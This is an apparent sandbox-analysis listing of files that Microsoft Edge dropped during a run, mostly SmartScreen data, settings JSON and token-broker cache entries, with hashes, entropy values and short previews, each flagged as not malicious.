                                                                                                                                                                                                                                                                                    SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):47
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                    MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                    SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                    SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                    SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):35
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                    MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                    SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                    SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                    SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):81
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                    MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                    SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                    SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                    SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):130439
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                    MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                    SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                    SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                    SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                    MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                    SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                    SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                    SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):57
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                    MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                    SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                    SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                    SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):29
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                    MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                    SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                    SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                    SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):575056
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                    MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                    SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                    SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                    SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):460992
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                    MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                    SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                    SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                    SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):9
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                    MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                    SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                    SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                    SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:uriCache_

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):179
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.0073646441709725
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclQybQ8yV:YWLSGTt1o9LuLgfGBPAzkVj/T8lQy08M
                                                                                                                                                                                                                                                                                    MD5:23CCD1445A424F2A1D1028E9BA23B50C
                                                                                                                                                                                                                                                                                    SHA1:D3336FBFA977968F4196632AC5C9AE27FA82515D
                                                                                                                                                                                                                                                                                    SHA-256:C3960D815F60E8503CB1B5F7194CAC7A63CD4ABED5D46A5096F42A7D154642B1
                                                                                                                                                                                                                                                                                    SHA-512:04A1EC676C1AB1E9B21BE883AC4E4CB0B2A020266026FD7FA99C7E14087F5BBA96AFAD6AEED443DB43A4A66E0252039A8A1CCA53C8FF7267FFEE2207A9723568
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1735034272753730}]}

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
                                                                                                                                                                                                                                                                                    MD5:16B7586B9EBA5296EA04B791FC3D675E
                                                                                                                                                                                                                                                                                    SHA1:8890767DD7EB4D1BEAB829324BA8B9599051F0B0
                                                                                                                                                                                                                                                                                    SHA-256:474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
                                                                                                                                                                                                                                                                                    SHA-512:58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ca986164-d00e-4b3e-a50b-dba7e0699aa3.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):45775
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.088255317822599
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:mMkbJrT8IeQc5d9FavuAhDO6vP6OrhR8qLKvFwycfCAoGGoup1Xl3jVzXr4QK:mMk1rT8H19F/6L/FRoGhu3VlXr4d
                                                                                                                                                                                                                                                                                    MD5:DFEF31F3E779AAE0F3A131149927A1D0
                                                                                                                                                                                                                                                                                    SHA1:7F826B8337DC5375A980BA54D5D38EBC31CEED94
                                                                                                                                                                                                                                                                                    SHA-256:C4288345EE4B0911A747B2F9BCCB4FAA1A4EB98BB889D3815EA44C69EAFE671D
                                                                                                                                                                                                                                                                                    SHA-512:12D4D2BBC4540D9C5110BFBE50083B31F0F39AE3EE11F69797B49594DEE53D644E5D3A945B5ED60A13E44656AA923445D50DB5B730C9D41CA938DA9E2E3A8537
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2278
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.831242095774037
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:uiTrlKxrgxzxl9Il8u/Je7a0ozwcrqJk0CsQyd1rc:mCYpJe7a0oscrqJk3sC
                                                                                                                                                                                                                                                                                    MD5:2209BD89B6DF5D609AA51791DC16948A
                                                                                                                                                                                                                                                                                    SHA1:4D3DCCAD2D5E853A7C20D533C85BD7957830017B
                                                                                                                                                                                                                                                                                    SHA-256:656B2BE793FE60B7C8D0342305A5B808D5A25E34025490D9FB8270FCB4FAEF12
                                                                                                                                                                                                                                                                                    SHA-512:A0DA5AF6ACE45C09B343A04060A70E7CED42384B5EBC7D9731F800A3324E01626C56776C75B488CD9C2659C0B730980CD20AC2E7F788E6F32A693A84692FD06D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.B.g.W./.A.d.V.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.p.m.Z.E.J.T.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):4622
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.985475935839216
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:uiTrlKxExDVxD9Il8u/QWK0Xr6D8AF1IQf1MH2+V4KJSvpF6YhAtfois8Bl/IlHL:3YpK0a86tMHNJSR0CQTsHRWLaSjXWwKz
                                                                                                                                                                                                                                                                                    MD5:0D569CD66E7006E5BFFA09E6A180B0A8
                                                                                                                                                                                                                                                                                    SHA1:885829B633AAA91D0007CBC461BE22C40DCD99A9
                                                                                                                                                                                                                                                                                    SHA-256:1D46B98FF29EF32483FDBD12755BE827F6856627F101BBB7838FE2FB1C8E546B
                                                                                                                                                                                                                                                                                    SHA-512:9E92EE84E3BDC534F80B7BB646228E9277E1214EE9EC72341E6E22EE9CA26926391E62561696DEEB2DD460D228EF1E8F72BBB3A209E50686806C9E319BA979CA
                                                                                                                                                                                                                                                                                    Malicious:false
